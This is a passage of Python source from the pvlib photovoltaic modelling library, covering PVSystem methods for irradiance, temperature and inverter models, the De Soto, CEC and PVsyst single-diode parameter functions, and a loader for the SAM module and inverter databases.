Diffuse horizontal irradiance
dni_extra : None, float or Series, default None
Extraterrestrial direct normal irradiance
airmass : None, float or Series, default None
Airmass
model : String, default 'haydavies'
Irradiance model.
kwargs
Extra parameters passed to :func:`irradiance.get_total_irradiance`.
Returns
-------
poa_irradiance : DataFrame
Column names are: ``total, beam, sky, ground``.
"""
# not needed for all models, but this is easier
if dni_extra is None:
dni_extra = irradiance.get_extra_radiation(solar_zenith.index)
if airmass is None:
airmass = atmosphere.get_relative_airmass(solar_zenith)
return irradiance.get_total_irradiance(self.surface_tilt,
self.surface_azimuth,
solar_zenith, solar_azimuth,
dni, ghi, dhi,
dni_extra=dni_extra,
airmass=airmass,
model=model,
albedo=self.albedo,
**kwargs)
def get_iam(self, aoi, iam_model='physical'):
"""
Determine the incidence angle modifier using the method specified by
``iam_model``.
Parameters for the selected IAM model are expected to be in
``PVSystem.module_parameters``. Default parameters are available for
the 'physical', 'ashrae' and 'martin_ruiz' models.
Parameters
----------
aoi : numeric
The angle of incidence in degrees.
aoi_model : string, default 'physical'
The IAM model to be used. Valid strings are 'physical', 'ashrae',
'martin_ruiz' and 'sapm'.
Returns
-------
iam : numeric
The AOI modifier.
Raises
------
ValueError if `iam_model` is not a valid model name.
"""
model = iam_model.lower()
if model in ['ashrae', 'physical', 'martin_ruiz']:
param_names = iam._IAM_MODEL_PARAMS[model]
kwargs = _build_kwargs(param_names, self.module_parameters)
func = getattr(iam, model)
return func(aoi, **kwargs)
elif model == 'sapm':
return iam.sapm(aoi, self.module_parameters)
elif model == 'interp':
raise ValueError(model + ' is not implemented as an IAM model'
'option for PVSystem')
else:
raise ValueError(model + ' is not a valid IAM model')
def calcparams_desoto(self, effective_irradiance, temp_cell, **kwargs):
"""
Use the :py:func:`calcparams_desoto` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
**kwargs
See pvsystem.calcparams_desoto for details
Returns
-------
See pvsystem.calcparams_desoto for details
"""
kwargs = _build_kwargs(['a_ref', 'I_L_ref', 'I_o_ref', 'R_sh_ref',
'R_s', 'alpha_sc', 'EgRef', 'dEgdT',
'irrad_ref', 'temp_ref'],
self.module_parameters)
return calcparams_desoto(effective_irradiance, temp_cell, **kwargs)
def calcparams_cec(self, effective_irradiance, temp_cell, **kwargs):
"""
Use the :py:func:`calcparams_cec` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
**kwargs
See pvsystem.calcparams_cec for details
Returns
-------
See pvsystem.calcparams_cec for details
"""
kwargs = _build_kwargs(['a_ref', 'I_L_ref', 'I_o_ref', 'R_sh_ref',
'R_s', 'alpha_sc', 'Adjust', 'EgRef', 'dEgdT',
'irrad_ref', 'temp_ref'],
self.module_parameters)
return calcparams_cec(effective_irradiance, temp_cell, **kwargs)
def calcparams_pvsyst(self, effective_irradiance, temp_cell):
"""
Use the :py:func:`calcparams_pvsyst` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
Returns
-------
See pvsystem.calcparams_pvsyst for details
"""
kwargs = _build_kwargs(['gamma_ref', 'mu_gamma', 'I_L_ref', 'I_o_ref',
'R_sh_ref', 'R_sh_0', 'R_sh_exp',
'R_s', 'alpha_sc', 'EgRef',
'irrad_ref', 'temp_ref',
'cells_in_series'],
self.module_parameters)
return calcparams_pvsyst(effective_irradiance, temp_cell, **kwargs)
def sapm(self, effective_irradiance, temp_cell, **kwargs):
"""
Use the :py:func:`sapm` function, the input parameters,
and ``self.module_parameters`` to calculate
Voc, Isc, Ix, Ixx, Vmp, and Imp.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : float or Series
The average cell temperature of cells within a module in C.
kwargs
See pvsystem.sapm for details
Returns
-------
See pvsystem.sapm for details
"""
return sapm(effective_irradiance, temp_cell, self.module_parameters)
def sapm_celltemp(self, poa_global, temp_air, wind_speed):
"""Uses :py:func:`temperature.sapm_cell` to calculate cell
temperatures.
Parameters
----------
poa_global : numeric
Total incident irradiance in W/m^2.
temp_air : numeric
Ambient dry bulb temperature in degrees C.
wind_speed : numeric
Wind speed in m/s at a height of 10 meters.
Returns
-------
numeric, values in degrees C.
"""
# warn user about change in default behavior in 0.9.
if (self.temperature_model_parameters == {} and self.module_type
is None and self.racking_model is None):
warnings.warn(
'temperature_model_parameters, racking_model, and module_type '
'are not specified. Reverting to deprecated default: SAPM '
'cell temperature model parameters for a glass/glass module '
'in open racking. In v0.9, temperature_model_parameters or a '
'valid combination of racking_model and module_type will be '
'required.',
pvlibDeprecationWarning)
params = temperature._temperature_model_params(
'sapm', 'open_rack_glass_glass')
self.temperature_model_parameters = params
kwargs = _build_kwargs(['a', 'b', 'deltaT'],
self.temperature_model_parameters)
return temperature.sapm_cell(poa_global, temp_air, wind_speed,
**kwargs)
def _infer_temperature_model_params(self):
# try to infer temperature model parameters from from racking_model
# and module_type
param_set = f'{self.racking_model}_{self.module_type}'
if param_set in temperature.TEMPERATURE_MODEL_PARAMETERS['sapm']:
return temperature._temperature_model_params('sapm', param_set)
elif 'freestanding' in param_set:
return temperature._temperature_model_params('pvsyst',
'freestanding')
elif 'insulated' in param_set: # after SAPM to avoid confusing keys
return temperature._temperature_model_params('pvsyst',
'insulated')
else:
return {}
def sapm_spectral_loss(self, airmass_absolute):
"""
Use the :py:func:`sapm_spectral_loss` function, the input
parameters, and ``self.module_parameters`` to calculate F1.
Parameters
----------
airmass_absolute : numeric
Absolute airmass.
Returns
-------
F1 : numeric
The SAPM spectral loss coefficient.
"""
return sapm_spectral_loss(airmass_absolute, self.module_parameters)
def sapm_effective_irradiance(self, poa_direct, poa_diffuse,
airmass_absolute, aoi,
reference_irradiance=1000):
"""
Use the :py:func:`sapm_effective_irradiance` function, the input
parameters, and ``self.module_parameters`` to calculate
effective irradiance.
Parameters
----------
poa_direct : numeric
The direct irradiance incident upon the module. [W/m2]
poa_diffuse : numeric
The diffuse irradiance incident on module. [W/m2]
airmass_absolute : numeric
Absolute airmass. [unitless]
aoi : numeric
Angle of incidence. [degrees]
Returns
-------
effective_irradiance : numeric
The SAPM effective irradiance. [W/m2]
"""
return sapm_effective_irradiance(
poa_direct, poa_diffuse, airmass_absolute, aoi,
self.module_parameters)
def pvsyst_celltemp(self, poa_global, temp_air, wind_speed=1.0):
"""Uses :py:func:`temperature.pvsyst_cell` to calculate cell
temperature.
Parameters
----------
poa_global : numeric
Total incident irradiance in W/m^2.
temp_air : numeric
Ambient dry bulb temperature in degrees C.
wind_speed : numeric, default 1.0
Wind speed in m/s measured at the same height for which the wind
loss factor was determined. The default value is 1.0, which is
the wind speed at module height used to determine NOCT.
Returns
-------
numeric, values in degrees C.
"""
kwargs = _build_kwargs(['eta_m', 'alpha_absorption'],
self.module_parameters)
kwargs.update(_build_kwargs(['u_c', 'u_v'],
self.temperature_model_parameters))
return temperature.pvsyst_cell(poa_global, temp_air, wind_speed,
**kwargs)
def faiman_celltemp(self, poa_global, temp_air, wind_speed=1.0):
"""
Use :py:func:`temperature.faiman` to calculate cell temperature.
Parameters
----------
poa_global : numeric
Total incident irradiance [W/m^2].
temp_air : numeric
Ambient dry bulb temperature [C].
wind_speed : numeric, default 1.0
Wind speed in m/s measured at the same height for which the wind
loss factor was determined. The default value 1.0 m/s is the wind
speed at module height used to determine NOCT. [m/s]
Returns
-------
numeric, values in degrees C.
"""
kwargs = _build_kwargs(['u0', 'u1'],
self.temperature_model_parameters)
return temperature.faiman(poa_global, temp_air, wind_speed,
**kwargs)
def fuentes_celltemp(self, poa_global, temp_air, wind_speed):
"""
Use :py:func:`temperature.fuentes` to calculate cell temperature.
Parameters
----------
poa_global : pandas Series
Total incident irradiance [W/m^2]
temp_air : pandas Series
Ambient dry bulb temperature [C]
wind_speed : pandas Series
Wind speed [m/s]
Returns
-------
temperature_cell : pandas Series
The modeled cell temperature [C]
Notes
-----
The Fuentes thermal model uses the module surface tilt for convection
modeling. The SAM implementation of PVWatts hardcodes the surface tilt
value at 30 degrees, ignoring whatever value is used for irradiance
transposition. This method defaults to using ``self.surface_tilt``, but
if you want to match the PVWatts behavior, you can override it by
including a ``surface_tilt`` value in ``temperature_model_parameters``.
"""
# default to using the PVSystem attribute, but allow user to
# override with a custom surface_tilt value
kwargs = {'surface_tilt': self.surface_tilt}
temp_model_kwargs = _build_kwargs([
'noct_installed', 'module_height', 'wind_height', 'emissivity',
'absorption', 'surface_tilt', 'module_width', 'module_length'],
self.temperature_model_parameters)
kwargs.update(temp_model_kwargs)
return temperature.fuentes(poa_global, temp_air, wind_speed,
**kwargs)
def first_solar_spectral_loss(self, pw, airmass_absolute):
"""
Use the :py:func:`first_solar_spectral_correction` function to
calculate the spectral loss modifier. The model coefficients are
specific to the module's cell type, and are determined by searching
for one of the following keys in self.module_parameters (in order):
- 'first_solar_spectral_coefficients' (user-supplied coefficients)
- 'Technology' - a string describing the cell type, can be read from
the CEC module parameter database
- 'Material' - a string describing the cell type, can be read from
the Sandia module database.
Parameters
----------
pw : array-like
atmospheric precipitable water (cm).
airmass_absolute : array-like
absolute (pressure corrected) airmass.
Returns
-------
modifier: array-like
spectral mismatch factor (unitless) which can be multiplied
with broadband irradiance reaching a module's cells to estimate
effective irradiance, i.e., the irradiance that is converted to
electrical current.
"""
if 'first_solar_spectral_coefficients' in \
self.module_parameters.keys():
coefficients = \
self.module_parameters['first_solar_spectral_coefficients']
module_type = None
else:
module_type = self._infer_cell_type()
coefficients = None
return atmosphere.first_solar_spectral_correction(pw,
airmass_absolute,
module_type,
coefficients)
def _infer_cell_type(self):
"""
Examines module_parameters and maps the Technology key for the CEC
database and the Material key for the Sandia database to a common
list of strings for cell type.
Returns
-------
cell_type: str
"""
_cell_type_dict = {'Multi-c-Si': 'multisi',
'Mono-c-Si': 'monosi',
'Thin Film': 'cigs',
'a-Si/nc': 'asi',
'CIS': 'cigs',
'CIGS': 'cigs',
'1-a-Si': 'asi',
'CdTe': 'cdte',
'a-Si': 'asi',
'2-a-Si': None,
'3-a-Si': None,
'HIT-Si': 'monosi',
'mc-Si': 'multisi',
'c-Si': 'multisi',
'Si-Film': 'asi',
'EFG mc-Si': 'multisi',
'GaAs': None,
'a-Si / mono-Si': 'monosi'}
if 'Technology' in self.module_parameters.keys():
# CEC module parameter set
cell_type = _cell_type_dict[self.module_parameters['Technology']]
elif 'Material' in self.module_parameters.keys():
# Sandia module parameter set
cell_type = _cell_type_dict[self.module_parameters['Material']]
else:
cell_type = None
return cell_type
def singlediode(self, photocurrent, saturation_current,
resistance_series, resistance_shunt, nNsVth,
ivcurve_pnts=None):
"""Wrapper around the :py:func:`pvlib.pvsystem.singlediode` function.
See :py:func:`pvsystem.singlediode` for details
"""
return singlediode(photocurrent, saturation_current,
resistance_series, resistance_shunt, nNsVth,
ivcurve_pnts=ivcurve_pnts)
def i_from_v(self, resistance_shunt, resistance_series, nNsVth, voltage,
saturation_current, photocurrent):
"""Wrapper around the :py:func:`pvlib.pvsystem.i_from_v` function.
See :py:func:`pvsystem.i_from_v` for details
"""
return i_from_v(resistance_shunt, resistance_series, nNsVth, voltage,
saturation_current, photocurrent)
# inverter now specified by self.inverter_parameters
def snlinverter(self, v_dc, p_dc):
"""Uses :py:func:`pvlib.inverter.sandia` to calculate AC power based on
``self.inverter_parameters`` and the input voltage and power.
See :py:func:`pvlib.inverter.sandia` for details
"""
return inverter.sandia(v_dc, p_dc, self.inverter_parameters)
def adrinverter(self, v_dc, p_dc):
"""Uses :py:func:`pvlib.inverter.adr` to calculate AC power based on
``self.inverter_parameters`` and the input voltage and power.
See :py:func:`pvlib.inverter.adr` for details
"""
return inverter.adr(v_dc, p_dc, self.inverter_parameters)
def scale_voltage_current_power(self, data):
"""
Scales the voltage, current, and power of the `data` DataFrame
by `self.modules_per_string` and `self.strings_per_inverter`.
Parameters
----------
data: DataFrame
Must contain columns `'v_mp', 'v_oc', 'i_mp' ,'i_x', 'i_xx',
'i_sc', 'p_mp'`.
Returns
-------
scaled_data: DataFrame
A scaled copy of the input data.
"""
return scale_voltage_current_power(data,
voltage=self.modules_per_string,
current=self.strings_per_inverter)
def pvwatts_dc(self, g_poa_effective, temp_cell):
"""
Calcuates DC power according to the PVWatts model using
:py:func:`pvlib.pvsystem.pvwatts_dc`, `self.module_parameters['pdc0']`,
and `self.module_parameters['gamma_pdc']`.
See :py:func:`pvlib.pvsystem.pvwatts_dc` for details.
"""
kwargs = _build_kwargs(['temp_ref'], self.module_parameters)
return pvwatts_dc(g_poa_effective, temp_cell,
self.module_parameters['pdc0'],
self.module_parameters['gamma_pdc'],
**kwargs)
def pvwatts_losses(self):
"""
Calculates DC power losses according the PVwatts model using
:py:func:`pvlib.pvsystem.pvwatts_losses` and
``self.losses_parameters``.
See :py:func:`pvlib.pvsystem.pvwatts_losses` for details.
"""
kwargs = _build_kwargs(['soiling', 'shading', 'snow', 'mismatch',
'wiring', 'connections', 'lid',
'nameplate_rating', 'age', 'availability'],
self.losses_parameters)
return pvwatts_losses(**kwargs)
def pvwatts_ac(self, pdc):
"""
Calculates AC power according to the PVWatts model using
:py:func:`pvlib.inverter.pvwatts`, `self.module_parameters["pdc0"]`,
and `eta_inv_nom=self.inverter_parameters["eta_inv_nom"]`.
See :py:func:`pvlib.inverter.pvwatts` for details.
"""
kwargs = _build_kwargs(['eta_inv_nom', 'eta_inv_ref'],
self.inverter_parameters)
return inverter.pvwatts(pdc, self.inverter_parameters['pdc0'],
**kwargs)
@deprecated('0.8', alternative='PVSystem, Location, and ModelChain',
name='PVSystem.localize', removal='0.9')
def localize(self, location=None, latitude=None, longitude=None,
**kwargs):
"""
Creates a LocalizedPVSystem object using this object
and location data. Must supply either location object or
latitude, longitude, and any location kwargs
Parameters
----------
location : None or Location, default None
latitude : None or float, default None
longitude : None or float, default None
**kwargs : see Location
Returns
-------
localized_system : LocalizedPVSystem
"""
if location is None:
location = Location(latitude, longitude, **kwargs)
return LocalizedPVSystem(pvsystem=self, location=location)
@deprecated('0.8', alternative='PVSystem, Location, and ModelChain',
            name='LocalizedPVSystem', removal='0.9')
class LocalizedPVSystem(PVSystem, Location):
    """
    A PVSystem at a specific Location.

    Combines the attributes and modeling methods of the PVSystem and
    Location classes in a single object. Robust multiple inheritance is
    difficult to implement, so this class may have bugs; prefer
    :py:class:`~pvlib.modelchain.ModelChain` for modeling PV systems at
    specific locations.
    """
    def __init__(self, pvsystem=None, location=None, **kwargs):
        # Merge attributes from both source objects, with explicit
        # keyword arguments taking precedence.
        merged = _combine_localized_attributes(
            pvsystem=pvsystem,
            location=location,
            **kwargs,
        )
        PVSystem.__init__(self, **merged)
        Location.__init__(self, **merged)

    def __repr__(self):
        attrs = ['name', 'latitude', 'longitude', 'altitude', 'tz',
                 'surface_tilt', 'surface_azimuth', 'module', 'inverter',
                 'albedo', 'racking_model', 'module_type',
                 'temperature_model_parameters']
        body = '\n '.join(f'{attr}: {getattr(self, attr)}' for attr in attrs)
        return 'LocalizedPVSystem:\n ' + body
def calcparams_desoto(effective_irradiance, temp_cell,
                      alpha_sc, a_ref, I_L_ref, I_o_ref, R_sh_ref, R_s,
                      EgRef=1.121, dEgdT=-0.0002677,
                      irrad_ref=1000, temp_ref=25):
    '''
    Calculate the five single diode equation parameter values at the given
    effective irradiance and cell temperature using the De Soto et al.
    model described in [1]_. The five returned values can be passed to
    :py:func:`singlediode` to calculate an IV curve.

    Parameters
    ----------
    effective_irradiance : numeric
        The irradiance (W/m2) that is converted to photocurrent.
    temp_cell : numeric
        The average cell temperature of cells within a module in C.
    alpha_sc : float
        The short-circuit current temperature coefficient of the
        module in units of A/C.
    a_ref : float
        The product of the usual diode ideality factor (n, unitless),
        number of cells in series (Ns), and cell thermal voltage at
        reference conditions, in units of V.
    I_L_ref : float
        The light-generated current (or photocurrent) at reference
        conditions, in amperes.
    I_o_ref : float
        The dark or diode reverse saturation current at reference
        conditions, in amperes.
    R_sh_ref : float
        The shunt resistance at reference conditions, in ohms.
    R_s : float
        The series resistance at reference conditions, in ohms.
    EgRef : float, default 1.121
        The energy bandgap at reference temperature in units of eV.
        1.121 eV for crystalline silicon. EgRef must be >0. For parameters
        from the SAM CEC module database, EgRef=1.121 is implicit for all
        cell types in the parameter estimation algorithm used by NREL.
    dEgdT : float, default -0.0002677
        The temperature dependence of the energy bandgap at reference
        conditions in units of 1/K. May be a scalar (e.g. -0.0002677 as in
        [1]_) or a DataFrame (useful if dEgdT is modeled as a function of
        temperature). For parameters from the SAM CEC module database,
        dEgdT=-0.0002677 is implicit for all cell types.
    irrad_ref : float, default 1000
        Reference irradiance in W/m^2.
    temp_ref : float, default 25
        Reference cell temperature in C.

    Returns
    -------
    photocurrent : numeric
        Light-generated current in amperes
    saturation_current : numeric
        Diode saturation current in amperes
    resistance_series : float
        Series resistance in ohms
    resistance_shunt : numeric
        Shunt resistance in ohms
    nNsVth : numeric
        The product of the usual diode ideality factor (n, unitless),
        number of cells in series (Ns), and cell thermal voltage at
        specified effective irradiance and cell temperature.

    Notes
    -----
    If the reference parameters are read from a database or library of
    parameters (e.g. the System Advisor Model), it is important to use the
    same EgRef and dEgdT values that were used to generate the reference
    parameters, regardless of the actual bandgap characteristics of the
    semiconductor. The SAM library, created as described in [3]_, used
    EgRef=1.121 and dEgdT=-0.0002677 for all modules.

    References
    ----------
    .. [1] W. De Soto et al., "Improvement and validation of a model for
       photovoltaic array performance", Solar Energy, vol 80, pp. 78-88,
       2006.
    .. [2] System Advisor Model web page. https://sam.nrel.gov.
    .. [3] A. Dobos, "An Improved Coefficient Calculator for the California
       Energy Commission 6 Parameter Photovoltaic Module Model", Journal of
       Solar Energy Engineering, vol 134, 2012.
    .. [4] O. Madelung, "Semiconductors: Data Handbook, 3rd ed." ISBN
       3-540-40488-0

    See Also
    --------
    singlediode
    retrieve_sam
    '''
    k = 8.617332478e-05  # Boltzmann constant [eV/K]
    tref_k = temp_ref + 273.15
    tcell_k = temp_cell + 273.15
    dT = tcell_k - tref_k

    # Bandgap with linear temperature dependence about the reference.
    E_g = EgRef * (1 + dEgdT * dT)

    # Modified ideality factor scales with absolute cell temperature.
    nNsVth = a_ref * (tcell_k / tref_k)

    # Photocurrent; effective_irradiance plays the role of the product S*M
    # (broadband irradiance times spectral modifier) used in [1].
    IL = effective_irradiance / irrad_ref * (I_L_ref + alpha_sc * dT)

    # Saturation current from the bandgap temperature dependence.
    I0 = (I_o_ref * ((tcell_k / tref_k) ** 3) *
          (np.exp(EgRef / (k * tref_k) - (E_g / (k * tcell_k)))))

    # Shunt resistance varies inversely with effective irradiance. This
    # differs from [1], where Rsh = Rsh_ref * (S_ref / S) with S the
    # broadband irradiance reaching the cells; that behavior can be
    # duplicated by applying reflection/soiling losses to broadband POA
    # irradiance and using spectral_modifier = 1.0. errstate silences the
    # divide-by-zero warning for zero irradiance.
    with np.errstate(divide='ignore'):
        Rsh = R_sh_ref * (irrad_ref / effective_irradiance)

    return IL, I0, R_s, Rsh, nNsVth
def calcparams_cec(effective_irradiance, temp_cell,
                   alpha_sc, a_ref, I_L_ref, I_o_ref, R_sh_ref, R_s,
                   Adjust, EgRef=1.121, dEgdT=-0.0002677,
                   irrad_ref=1000, temp_ref=25):
    '''
    Calculates five parameter values for the single diode equation at
    effective irradiance and cell temperature using the CEC
    model. The CEC model [1]_ differs from the De soto et al.
    model [3]_ by the parameter Adjust. The five values returned by
    calcparams_cec can be used by singlediode to calculate an IV curve.

    Parameters
    ----------
    effective_irradiance : numeric
        The irradiance (W/m2) that is converted to photocurrent.
    temp_cell : numeric
        The average cell temperature of cells within a module in C.
    alpha_sc : float
        The short-circuit current temperature coefficient of the
        module in units of A/C.
    a_ref : float
        The product of the usual diode ideality factor (n, unitless),
        number of cells in series (Ns), and cell thermal voltage at reference
        conditions, in units of V.
    I_L_ref : float
        The light-generated current (or photocurrent) at reference conditions,
        in amperes.
    I_o_ref : float
        The dark or diode reverse saturation current at reference conditions,
        in amperes.
    R_sh_ref : float
        The shunt resistance at reference conditions, in ohms.
    R_s : float
        The series resistance at reference conditions, in ohms.
    Adjust : float
        The adjustment to the temperature coefficient for short circuit
        current, in percent
    EgRef : float
        The energy bandgap at reference temperature in units of eV.
        1.121 eV for crystalline silicon. EgRef must be >0. For parameters
        from the SAM CEC module database, EgRef=1.121 is implicit for all
        cell types in the parameter estimation algorithm used by NREL.
    dEgdT : float
        The temperature dependence of the energy bandgap at reference
        conditions in units of 1/K. May be either a scalar value
        (e.g. -0.0002677 as in [3]) or a DataFrame (this may be useful if
        dEgdT is a modeled as a function of temperature). For parameters from
        the SAM CEC module database, dEgdT=-0.0002677 is implicit for all cell
        types in the parameter estimation algorithm used by NREL.
    irrad_ref : float (optional, default=1000)
        Reference irradiance in W/m^2.
    temp_ref : float (optional, default=25)
        Reference cell temperature in C.

    Returns
    -------
    Tuple of the following results:

    photocurrent : numeric
        Light-generated current in amperes
    saturation_current : numeric
        Diode saturation curent in amperes
    resistance_series : float
        Series resistance in ohms
    resistance_shunt : numeric
        Shunt resistance in ohms
    nNsVth : numeric
        The product of the usual diode ideality factor (n, unitless),
        number of cells in series (Ns), and cell thermal voltage at
        specified effective irradiance and cell temperature.

    References
    ----------
    .. [1] A. Dobos, "An Improved Coefficient Calculator for the California
       Energy Commission 6 Parameter Photovoltaic Module Model", Journal of
       Solar Energy Engineering, vol 134, 2012.
    .. [2] System Advisor Model web page. https://sam.nrel.gov.
    .. [3] W. De Soto et al., "Improvement and validation of a model for
       photovoltaic array performance", Solar Energy, vol 80, pp. 78-88,
       2006.

    See Also
    --------
    calcparams_desoto
    singlediode
    retrieve_sam
    '''
    # Delegate to the De Soto model with the Adjust-corrected temperature
    # coefficient. NOTE: forward the user-supplied EgRef, dEgdT, irrad_ref
    # and temp_ref arguments; previously the defaults were hard-coded here,
    # silently ignoring any non-default values passed by the caller.
    return calcparams_desoto(effective_irradiance, temp_cell,
                             alpha_sc*(1.0 - Adjust/100),
                             a_ref, I_L_ref, I_o_ref,
                             R_sh_ref, R_s,
                             EgRef=EgRef, dEgdT=dEgdT,
                             irrad_ref=irrad_ref, temp_ref=temp_ref)
def calcparams_pvsyst(effective_irradiance, temp_cell,
                      alpha_sc, gamma_ref, mu_gamma,
                      I_L_ref, I_o_ref,
                      R_sh_ref, R_sh_0, R_s,
                      cells_in_series,
                      R_sh_exp=5.5,
                      EgRef=1.121,
                      irrad_ref=1000, temp_ref=25):
    '''
    Calculate the five single diode equation parameter values at the given
    effective irradiance and cell temperature using the PVsyst v6 model,
    described in [1]_, [2]_, [3]_. The five returned values can be passed
    to :py:func:`singlediode` to calculate an IV curve.

    Parameters
    ----------
    effective_irradiance : numeric
        The irradiance (W/m2) that is converted to photocurrent.
    temp_cell : numeric
        The average cell temperature of cells within a module in C.
    alpha_sc : float
        The short-circuit current temperature coefficient of the
        module in units of A/C.
    gamma_ref : float
        The diode ideality factor
    mu_gamma : float
        The temperature coefficient for the diode ideality factor, 1/K
    I_L_ref : float
        The light-generated current (or photocurrent) at reference
        conditions, in amperes.
    I_o_ref : float
        The dark or diode reverse saturation current at reference
        conditions, in amperes.
    R_sh_ref : float
        The shunt resistance at reference conditions, in ohms.
    R_sh_0 : float
        The shunt resistance at zero irradiance conditions, in ohms.
    R_s : float
        The series resistance at reference conditions, in ohms.
    cells_in_series : integer
        The number of cells connected in series.
    R_sh_exp : float, default 5.5
        The exponent in the equation for shunt resistance, unitless.
    EgRef : float, default 1.121
        The energy bandgap at reference temperature in units of eV.
        1.121 eV for crystalline silicon. EgRef must be >0.
    irrad_ref : float, default 1000
        Reference irradiance in W/m^2.
    temp_ref : float, default 25
        Reference cell temperature in C.

    Returns
    -------
    photocurrent : numeric
        Light-generated current in amperes
    saturation_current : numeric
        Diode saturation current in amperes
    resistance_series : float
        Series resistance in ohms
    resistance_shunt : numeric
        Shunt resistance in ohms
    nNsVth : numeric
        The product of the usual diode ideality factor (n, unitless),
        number of cells in series (Ns), and cell thermal voltage at
        specified effective irradiance and cell temperature.

    References
    ----------
    .. [1] K. Sauer, T. Roessler, C. W. Hansen, Modeling the Irradiance and
       Temperature Dependence of Photovoltaic Modules in PVsyst,
       IEEE Journal of Photovoltaics v5(1), January 2015.
    .. [2] A. Mermoud, PV modules modelling, Presentation at the 2nd PV
       Performance Modeling Workshop, Santa Clara, CA, May 2013
    .. [3] A. Mermoud, T. Lejeune, Performance Assessment of a Simulation
       Model for PV modules of any available technology, 25th European
       Photovoltaic Solar Energy Conference, Valencia, Spain, Sept. 2010

    See Also
    --------
    calcparams_desoto
    singlediode
    '''
    k = 1.38064852e-23  # Boltzmann constant [J/K]
    q = 1.6021766e-19   # elementary charge [C]
    tref_k = temp_ref + 273.15
    tcell_k = temp_cell + 273.15
    dT = tcell_k - tref_k

    # Diode ideality factor with linear temperature dependence.
    gamma = gamma_ref + mu_gamma * dT
    nNsVth = gamma * k / q * cells_in_series * tcell_k

    IL = effective_irradiance / irrad_ref * (I_L_ref + alpha_sc * dT)

    I0 = I_o_ref * ((tcell_k / tref_k) ** 3) * \
        (np.exp((q * EgRef) / (k * gamma) * (1 / tref_k - 1 / tcell_k)))

    # Shunt resistance interpolates exponentially in irradiance between
    # the dark value R_sh_0 and the reference value R_sh_ref.
    shunt_at_ref = \
        (R_sh_ref - R_sh_0 * np.exp(-R_sh_exp)) / (1.0 - np.exp(-R_sh_exp))
    shunt_base = np.maximum(0.0, shunt_at_ref)
    Rsh = shunt_base + (R_sh_0 - shunt_base) * \
        np.exp(-R_sh_exp * effective_irradiance / irrad_ref)

    return IL, I0, R_s, Rsh, nNsVth
def retrieve_sam(name=None, path=None):
    '''
    Retrieve the latest module and inverter info from a local file or the
    SAM website.

    This function will retrieve either:

    * CEC module database
    * Sandia Module database
    * CEC Inverter database
    * Anton Driesse Inverter database

    and return it as a pandas DataFrame.

    Parameters
    ----------
    name : None or string, default None
        Name can be one of:

        * 'CECMod' - returns the CEC module database
        * 'CECInverter' - returns the CEC Inverter database
        * 'SandiaInverter' - returns the CEC Inverter database
          (CEC is only current inverter db available; tag kept for
          backwards compatibility)
        * 'SandiaMod' - returns the Sandia Module database
        * 'ADRInverter' - returns the ADR Inverter database
    path : None or string, default None
        Path to the SAM file. May also be a URL.

    Returns
    -------
    samfile : DataFrame
        A DataFrame containing all the elements of the desired database.
        Each column represents a module or inverter.

    Raises
    ------
    ValueError
        If no name or path is provided.

    Notes
    -----
    Files available at
        https://github.com/NREL/SAM/tree/develop/deploy/libraries
    Documentation for module and inverter data sets:
        https://sam.nrel.gov/photovoltaic/pv-sub-page-2.html
    '''
    # Map normalized database names to the CSV files shipped with pvlib.
    # 'sandiainverter' aliases the CEC inverter file for backwards
    # compatibility; CEC is the only inverter db currently available.
    _db_files = {
        'cecmod': 'sam-library-cec-modules-2019-03-05.csv',
        'sandiamod': 'sam-library-sandia-modules-2015-6-30.csv',
        'adrinverter': 'adr-library-2013-10-01.csv',
        'cecinverter': 'sam-library-cec-inverters-2019-03-05.csv',
        'sandiainverter': 'sam-library-cec-inverters-2019-03-05.csv',
    }

    if name is not None:
        name = name.lower()
        if name not in _db_files:
            raise ValueError(f'invalid name {name}')
        data_path = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), 'data')
        csvdata = os.path.join(data_path, _db_files[name])
    elif path is not None:
        if path.startswith('http'):
            # Fetch remote files into an in-memory buffer for pandas.
            response = urlopen(path)
            csvdata = io.StringIO(response.read().decode(errors='ignore'))
        else:
            csvdata = path
    else:
        raise ValueError("A name or path must be provided!")

    return _parse_raw_sam_df(csvdata)
def _normalize_sam_product_names(names):
'''
Replace special characters within the product names to make them more
suitable for use as Dataframe column names.
'''
# Contributed by Anton Driesse (@adriesse), PV Performance Labs. July, 2019
import warnings
BAD_CHARS = ' -.()[]:+/",'
GOOD_CHARS = '____________'
mapping = str.maketrans(BAD_CHARS, GOOD_CHARS)
names = pd.Series(data=names)
norm_names = names.str.translate(mapping)
n_duplicates = names.duplicated().sum()
if n_duplicates > 0:
warnings.warn('Original names contain %d duplicate(s).' % n_duplicates)
n_duplicates = norm_names.duplicated().sum()
if n_duplicates > 0:
warnings.warn(
'Normalized names contain %d duplicate(s).' % n_duplicates)
return norm_names.values
def _parse_raw_sam_df(csvdata):
    # Rows 2-3 of the SAM CSV files contain units/metadata, not data.
    data = pd.read_csv(csvdata, index_col=0, skiprows=[1, 2])
    data.columns = data.columns.str.replace(' ', '_')
    data.index = _normalize_sam_product_names(data.index)
    data = data.transpose()

    if 'ADRCoefficients' in data.index:
        def _to_float_list(text):
            # Parse a coefficient string like ' 1.33 2.11 3.12' into
            # a list of floats: [1.33, 2.11, 3.12]
            return list(map(float, text.strip(' []').split()))

        data.loc['ADRCoefficients'] = \
            data.loc['ADRCoefficients'].map(_to_float_list)

    return data
def sapm(effective_irradiance, temp_cell, module):
    '''
    The Sandia PV Array Performance Model (SAPM) generates 5 points on a
    PV module's I-V curve (Voc, Isc, Ix, Ixx, Vmp/Imp) according to
    SAND2004-3535. Assumes a reference cell temperature of 25 C.
    Parameters
    ----------
    effective_irradiance : numeric
        Irradiance reaching the module's cells, after reflections and
        adjustment for spectrum. [W/m2]
    temp_cell : numeric
        Cell temperature [C].
    module : dict-like
        A dict or Series defining the SAPM parameters. See the notes section
        for more details.
    Returns
    -------
    A DataFrame with the columns:
